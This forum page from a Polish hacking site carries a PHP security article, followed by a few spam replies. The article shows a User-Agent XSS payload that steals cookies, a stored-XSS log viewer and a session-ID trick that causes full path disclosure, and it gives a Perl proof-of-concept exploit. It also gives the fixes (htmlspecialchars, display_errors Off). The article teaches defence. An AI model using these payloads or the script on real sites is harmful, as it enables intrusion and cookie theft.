Rejestracja
•
Szukaj
•
FAQ
•
Użytkownicy
•
Grupy
•
Galerie
•
Zaloguj
Forum wszystko o hackingu i nie tylko Strona Główna
»
Bezpieczeństwo serwerów
Napisz odpowiedź
Użytkownik
Temat
Treść wiadomości
Emotikony
Więcej Ikon
Kolor:
Domyślny
Ciemnoczerwony
Czerwony
Pomarańćzowy
Brązowy
Żółty
Zielony
Oliwkowy
Błękitny
Niebieski
Ciemnoniebieski
Purpurowy
Fioletowy
Biały
Czarny
Rozmiar:
Minimalny
Mały
Normalny
Duży
Ogromny
Zamknij Tagi
Add image to post
Opcje
HTML:
NIE
BBCode
:
TAK
Uśmieszki:
TAK
Wyłącz BBCode w tym poście
Wyłącz Uśmieszki w tym poście
Kod potwierdzający: *
Wszystkie czasy w strefie EET (Europa)
Skocz do:
Wybierz forum
Uwaga
----------------
UWAGA!
Hacking
----------------
Różne
Exploity
Buffer Overflow
File Stream Pointer Overwrite
Bugtraq
Heap Overflow
Przechwytywanie informacji w sieciach LAN
SQL Injection
Gadu-Gadu
Phishing
XSS
DoS
Kursy Programowania
----------------
Assembler
PHP
C/C++
HTML
XHTML
Perl
Turbo Pascal
Download
----------------
Sniffery,Bindery,Keyloggery
Różne programy hakerskie
Skanery
Exploity
Reklama
----------------
Hackme.pl
Hacking.pl
Hackme 3.0 - GRA
Szkoła Hakerów
NiggaStyle
Master-warez.tk
Inter-line
Evilteam
Hemp Gru Team - Counter Strike 1.6 Clan
Bezpieczeństwo
----------------
Łaty
Bezpieczeństwo serwerów
Windows
Windows
----------------
przechowywanie haseł
triki hakerskie
różne
Linux
----------------
przechowywanie haseł
różne
Licznik
----------------
Licznik odwiedzin
Klikajcie!!!
Przegląd tematu
<table cellpadding="3" cellspacing="0" width="100%" class="forumline"> <thead> <caption><table border="0" cellspacing="0" cellpadding="0" width="100%" class="forumheader"> <tr> <td align="left" valign="bottom" width="25"><img src="http://picsrv.fora.pl/AcidTechTiger/images/hdr_left.gif" width="25" height="27" alt="" /></td> <td align="center" class="forumheader-mid">Przegląd tematu</td> <td align="right" valign="bottom" width="25"><img src="http://picsrv.fora.pl/AcidTechTiger/images/hdr_right.gif" width="25" height="27" alt="" /></td> </tr></table></caption> </thead> <tbody> <tr> <th class="thCornerL" width="22%" height="26">Autor</th> <th class="thCornerR">Wiadomość</th> </tr> <tr> <td width="22%" align="left" valign="top" class="row1"><span class="name"><a name=""></a><b>honda-radio</b></span></td> <td class="row1" height="28" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="100%"><img src="http://picsrv.fora.pl/AcidTechTiger/images/post_old.gif" width="12" height="9" alt="Post" title="Post" border="0" /><span class="postdetails">Wysłany: Sob 4:37, 16 Lut 2008<span class="gen"> </span> Temat postu: </span></td> </tr> <tr> <td colspan="2"><hr /></td> </tr> <tr> <td colspan="2"><span class="postbody">Thx! <img src="http://picsrv.fora.pl/images/smiles/icon_smile.gif" alt="Smile" border="0" /></span></td> </tr> </table></td> </tr> <tr> <td colspan="2" class="spaceRow"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" alt="" width="1" height="1" /></td> </tr> <tr> <td width="22%" align="left" valign="top" class="row2"><span class="name"><a name=""></a><b>BMW</b></span></td> <td class="row2" height="28" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="100%"><img src="http://picsrv.fora.pl/AcidTechTiger/images/post_old.gif" width="12" height="9" alt="Post" title="Post" border="0" /><span class="postdetails">Wysłany: Nie 17:55, 20 Sty 2008<span class="gen"> </span> Temat postu: </span></td> </tr> <tr> <td colspan="2"><hr /></td> </tr> <tr> <td colspan="2"><span class="postbody">Cool site! Helpful topic! <img src="http://picsrv.fora.pl/images/smiles/icon_smile.gif" alt="Smile" border="0" /></span></td> </tr> </table></td> </tr> <tr> <td colspan="2" class="spaceRow"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" alt="" width="1" height="1" /></td> </tr> <tr> <td width="22%" align="left" valign="top" class="row1"><span class="name"><a name=""></a><b>Kilkoi</b></span></td> <td class="row1" height="28" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="100%"><img src="http://picsrv.fora.pl/AcidTechTiger/images/post_old.gif" width="12" height="9" alt="Post" title="Post" border="0" /><span class="postdetails">Wysłany: Pon 14:30, 24 Gru 2007<span class="gen"> </span> Temat postu: </span></td> </tr> <tr> <td colspan="2"><hr /></td> </tr> <tr> <td colspan="2"><span class="postbody">Cool topic! <img src="http://picsrv.fora.pl/images/smiles/icon_wink.gif" alt="Wink" border="0" /></span></td> </tr> </table></td> </tr> <tr> <td colspan="2" class="spaceRow"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" alt="" width="1" height="1" /></td> </tr> <tr> <td width="22%" align="left" valign="top" class="row2"><span class="name"><a name=""></a><b>Kilkoi</b></span></td> <td class="row2" height="28" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="100%"><img src="http://picsrv.fora.pl/AcidTechTiger/images/post_old.gif" width="12" height="9" alt="Post" title="Post" border="0" /><span class="postdetails">Wysłany: Nie 20:24, 23 Gru 2007<span class="gen"> </span> Temat postu: </span></td> </tr> <tr> <td colspan="2"><hr /></td> </tr> <tr> <td colspan="2"><span class="postbody">Cool topic! <img src="http://picsrv.fora.pl/images/smiles/icon_wink.gif" alt="Wink" border="0" /></span></td> </tr> </table></td> </tr> <tr> <td colspan="2" class="spaceRow"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" alt="" width="1" height="1" /></td> </tr> <tr> <td width="22%" align="left" valign="top" class="row1"><span class="name"><a name=""></a><b>ehklxvxvzq</b></span></td> <td class="row1" height="28" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="100%"><img src="http://picsrv.fora.pl/AcidTechTiger/images/post_old.gif" width="12" height="9" alt="Post" title="Post" border="0" /><span class="postdetails">Wysłany: Śro 17:37, 17 Paź 2007<span class="gen"> </span> Temat postu: </span></td> </tr> <tr> <td colspan="2"><hr /></td> </tr> <tr> <td colspan="2"><span class="postbody">Hello! Good Site! Thanks you! ypnxyyzzaq</span></td> </tr> </table></td> </tr> <tr> <td colspan="2" class="spaceRow"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" alt="" width="1" height="1" /></td> </tr> <tr> <td width="22%" align="left" valign="top" class="row2"><span class="name"><a name=""></a><b>haker512</b></span></td> <td class="row2" height="28" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="100%"><img src="http://picsrv.fora.pl/AcidTechTiger/images/post_old.gif" width="12" height="9" alt="Post" title="Post" border="0" /><span class="postdetails">Wysłany: Pią 20:45, 09 Lut 2007<span class="gen"> </span> Temat postu: php</span></td> </tr> <tr> <td colspan="2"><hr /></td> </tr> <tr> <td colspan="2"><span class="postbody">1) Wprowadzenie. <br />2) (Nie)bezpieczeństwo wyświetlania wersji przeglądarki. <br />3) Sesje.. <br /> <br /> <br />-=-=-=-=-=-=-=-=-=-=-=-=-=-=- <br /> <br /> <br />1) <br /> <br /> <br />W tym artykule postaram się przedstawić pare zagadnień z obszaru <br />bezpieczeństwa skryptów PHP, głównie na podstawie moich doświadczeń. <br />Postaram się aby rzeczy które tu przedstawie nie były kopią (małą zmianą) <br />innych publikacji, na temat ogólnego bezpieczeństwa w PHP <br />a raczej innym aspektem spojrzenia na tego typu zagadnienie. <br />Tak czy inaczej mam nadzieje że artykuł przedstawi coś nowego w tym temacie. <br /> <br /> <br />-=-=-=-=-=-=-=-=-=-=-=-=-=-=- <br /> <br /> <br />2) <br /> <br /> <br />Jak wiadomo jednym ze sposób wyświetlenia na stronie wersji przeglądarki <br />użytkownika jest użycie zmiennej 'HTTP_USER_AGENT' w praktyce wygląda to tak: <br /> <br /> <br />- - - <br /><table width="90%" cellspacing="0" cellpadding="0" align="center" class="code-table"><tr> <td width="19" height="19" class="code-corner"><img src="http://picsrv.fora.pl/AcidTechTiger/images/code_header.gif" width="19" height="19" alt="" /></td> <td width="100%" align="left" class="code-header">Kod:</td></tr><tr> <td class="code-left"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" width="19" height="40" alt="" /></td> <td class="code-text">$user_agent = $_SERVER['HTTP_USER_AGENT']; <br />echo $user_agent; <br />?></td> </tr></table> <br />- - - <br /> <br /> <br />Skrypt ten wyświetli nazwę przeglądarki użytkownika na stronie. <br />Co więc jest niebezpiecznego w takim skrypcie? <br />A więc możemy wysłać w nagłówku 'User-Agent' kod XSS który zostanie wykonany. <br />Przedstawie teraz mniej więcej jak ma wyglądać taki nagłówek: <br /> <br /> <br />- - - <br /><table width="90%" cellspacing="0" cellpadding="0" align="center" class="code-table"><tr> <td width="19" height="19" class="code-corner"><img src="http://picsrv.fora.pl/AcidTechTiger/images/code_header.gif" width="19" height="19" alt="" /></td> <td width="100%" align="left" class="code-header">Kod:</td></tr><tr> <td class="code-left"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" width="19" height="40" alt="" /></td> <td class="code-text">$ telnet localhost 80 <br />Trying 127.0.0.1... <br />Connected to localhost. <br />Escape character is '^]'. <br />GET /tmp/index.php HTTP/1.0 <br />User-Agent: <script>alert(document.cookie)</script></td> </tr></table> <br />- - - <br /> <br /> <br />Oczywiście w telnecie nie zobaczymy co się stało <img src="http://picsrv.fora.pl/images/smiles/icon_wink.gif" alt="Wink" border="0" /> <br />ale można użyć przeglądarki tekstowej typu lynx, links <br />aby kod javascript został wykonany. <br />Teraz pewnie ktoś by zadał pytanie 'Jak można to właściwie wykorzystać?' <br /> <br /> <br />A więc załóżmy że mamy na stronie takie skrypty: <br /> <br /> <br />- - - <br /><table width="90%" cellspacing="0" cellpadding="0" align="center" class="code-table"><tr> <td width="19" height="19" class="code-corner"><img src="http://picsrv.fora.pl/AcidTechTiger/images/code_header.gif" width="19" height="19" alt="" /></td> <td width="100%" align="left" class="code-header">Kod:</td></tr><tr> <td class="code-left"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" width="19" height="40" alt="" /></td> <td class="code-text">// index.php <br />$user_agent = $_SERVER['HTTP_USER_AGENT']; <br />$dane = $_SERVER['REMOTE_ADDR']." - ".$user_agent." <br />\n"; <br />$nazwapliku = 'log.txt'; <br />if(isset($user_agent)) { <br />$uchwyt = fopen($nazwapliku, 'a'); <br />fwrite($uchwyt, $dane); <br />fclose($uchwyt); <br />} <br />?> <br />- - - <br /> <br /> <br />- - - <br />// admin.php <br />$nazwapliku = 'log.txt'; <br />$uchwyt = fopen($nazwapliku, "r"); <br />readfile("log.txt"); <br />?></td> </tr></table> <br />- - - <br /> <br /> <br />Plik index.php zapisuje adres IP i nazwę przeglądarki do pliku, <br />admin.php po prostu odczytuje dane z pliku log.txt, <br />a następnie wyświetla je na stronie. <br />Wszystko działa prawidłowo. <br />Ale jeśli zmienimy nagłówek 'User-Agent' możemy zastosować atak 'html injection' <br />jak i 'XSS' co daje bardzo duże możliwości wykorzystania.. <br /> <br /> <br />Co do zabezpieczeń, myśle że zastosowanie funkcji <br />'htmlspecialchars()' na '$_SERVER['HTTP_USER_AGENT']' będzie odpowiednie. <br /> <br />Wygląda to tak: <br /> <br /> <br />- - - <br /><table width="90%" cellspacing="0" cellpadding="0" align="center" class="code-table"><tr> <td width="19" height="19" class="code-corner"><img src="http://picsrv.fora.pl/AcidTechTiger/images/code_header.gif" width="19" height="19" alt="" /></td> <td width="100%" align="left" class="code-header">Kod:</td></tr><tr> <td class="code-left"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" width="19" height="40" alt="" /></td> <td class="code-text">$user_agent = $_SERVER['HTTP_USER_AGENT']; <br />echo htmlspecialchars($user_agent); <br />?></td> </tr></table> <br />- - - <br /> <br /> <br />-=-=-=-=-=-=-=-=-=-=-=-=-=-=- <br /> <br /> <br />2) <br /> <br /> <br />Pozwolę sobie zacytować: <br /> <br /> <br />"Gość wchodzący na twoją stronę WWW otrzymuje unikalny identyfikator, tzw. id sesji. <br />Jest ono przechowywane albo jako ciasteczko po stronie użytkownika <br />lub propagowane w URL'u." (C php.net) <br /> <br /> <br />Dość niedawno odkryłem dziwne zachowanie php gdy jako id sesji podamy 'złe znaki' <br />jak np: '@, !, #, ^' itd.. mianowicie php wyrzuca błąd przez co ujawnia ścieżkę <br />dostępu do pliku. Przykład: <br /> <br /><table width="90%" cellspacing="0" cellpadding="0" align="center" class="code-table"><tr> <td width="19" height="19" class="code-corner"><img src="http://picsrv.fora.pl/AcidTechTiger/images/code_header.gif" width="19" height="19" alt="" /></td> <td width="100%" align="left" class="code-header">Kod:</td></tr><tr> <td class="code-left"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" width="19" height="40" alt="" /></td> <td class="code-text"> <br />- - - <br />session_start(); <br />?> <br />- - - <br /> <br /> <br />- - - <br />$ telnet localhost 80 <br />Trying 127.0.0.1... <br />Connected to localhost. <br />Escape character is '^]'. <br />GET /tmp/index.php HTTP/1.0 <br />Cookie: PHPSESSID=@ <br />HTTP/1.1 200 OK <br />(...) <br />Warning: session_start(): The session id contains invalid characters, <br />valid characters are only a-z, A-Z and 0-9 in /var/www/htdocs/tmp/index.php <br />on line 3 <br /> <br /> <br /> <br />Warning: Unknown(): The session id contains invalid characters, valid characters <br />are only a-z, A-Z and 0-9 in Unknown <br />on line 0 <br /> <br /> <br /> <br />Warning: Unknown(): Failed to write session data (files). <br />Please verify that the current setting of session.save_path is correct <br />(/tmp) in Unknown on line 0 <br /> <br />Connection closed by foreign host. <br />- - -</td> </tr></table> <br /> <br /> <br />Oczywiście możemy się przed tym zabezpieczyć poprzez zmienną 'display_errors' <br />ustawioną na 'Off' lub też dodać '@' przed 'session_start()' co zmniejszy 'wyciek informacji' <br /> <br /> <br />Pozwoliłem sobie napisać prostego 'POC' exploita na ten błąd : <br /> <br />Kod: <br /> <br /> <br /><table width="90%" cellspacing="0" cellpadding="0" align="center" class="code-table"><tr> <td width="19" height="19" class="code-corner"><img src="http://picsrv.fora.pl/AcidTechTiger/images/code_header.gif" width="19" height="19" alt="" /></td> <td width="100%" align="left" class="code-header">Kod:</td></tr><tr> <td class="code-left"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" width="19" height="40" alt="" /></td> <td class="code-text"> <br /> <br />#!/usr/bin/perl <br /># <br /># (Proof Of Concept) by Kamil 'K3' Sienicki <br /># <br /># display_errors must be On <br /># <br /> <br /> <br />use IO::Socket; <br /> <br />if(@ARGV < 3) { <br />print "\n"; <br />print "PHP Exploit (POC)\n"; <br />print " by Kamil 'K3' Sienicki\n\n"; <br />print "1. Create fake session file (sess_fake) in directory (default /tmp). \n"; <br />print "2. Full path disclosure.\n\n"; <br /> <br /> <br />print "Usage: ./php_bug.pl [host] [address] [type of attack (1 or 2)]\n\n"; <br /> <br /> <br />exit; <br />} <br /> <br /> <br />$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "80" ) || die "[-] Connect failed! \r\n"; <br /> <br /> <br />if($ARGV[2] == 1) { <br />print "\n"; <br />print "PHP Exploit (POC)\n"; <br />print " by Kamil 'K3' Sienicki\n\n"; <br />print "Name of session (default PHPSESSID): "; <br />$sess = ; <br />print "Name of fake sess_file: "; <br />$fake = ; <br />chomp($sess,$fake); <br />print $socket "GET $ARGV[1] HTTP/1.0\n"; <br />print $socket "Cookie: $sess=$fake\n\n"; <br />print "'$fake' fake file was created.. \n"; <br />} elsif ($ARGV[2] == 2) { <br /> <br /> <br />print "\n"; <br /> <br /> <br />print "PHP Exploit (POC)\n"; <br />print " by Kamil 'K3' Sienicki\n\n"; <br />print "Name of session (default PHPSESSID): "; <br />$sess = ; <br />chomp($sess); <br />print $socket "GET $ARGV[1] HTTP/1.0\n"; <br />print $socket "Cookie: $sess=@\n\n"; <br />while ($answer = <$socket>) { <br />if ($answer =~ m/^...Warning/) { <br />print $answer."\n"; <br />} <br />} <br /> <br /> <br />}</td> </tr></table> <br /> <br /> <br /> <br /> <br /> <br /> <br /> <br />Co najdziwniejsze po opublikowaniu tego 'błędu?' na bugs.php.net <br />stwierdzone zostało że wcale nie jest to żaden bug. <br />Jak to zostało mniej więcej napisane.. wiekszość błędów wyświetla ścieżkę dostępu do pliku. <br />Problem w tym że użytkownik może napisać 'teoretycznie' prawidłowy kod który 'praktycznie' <br />nie będzie 100% bezpieczny a sam nie będzie o tym wiedział. <br />Jeśli stosuje 'obscurity' czyli np: ukrywa w ścieżce ważne nadrzędne katalogi <br />(z doświadczenia wiem że często tak się zdarza) tym bardziej tzw. <br />'Full Path Disclosure' będzie w tym przypadku niebezpieczny i możemy <br />uzyskać informacje do których nie powinniśmy mieć dostępu..</span></td> </tr> </table></td> </tr> <tr> <td colspan="2" class="spaceRow"><img src="http://picsrv.fora.pl/AcidTechTiger/images/spacer.gif" alt="" width="1" height="1" /></td> </tr> </tbody> </table>
fora.pl
- załóż własne forum dyskusyjne za darmo
Powered by
phpBB
© 2001, 2005 phpBB Group
Design by
Freestyle XL
/
Music Lyrics
.
Regulamin
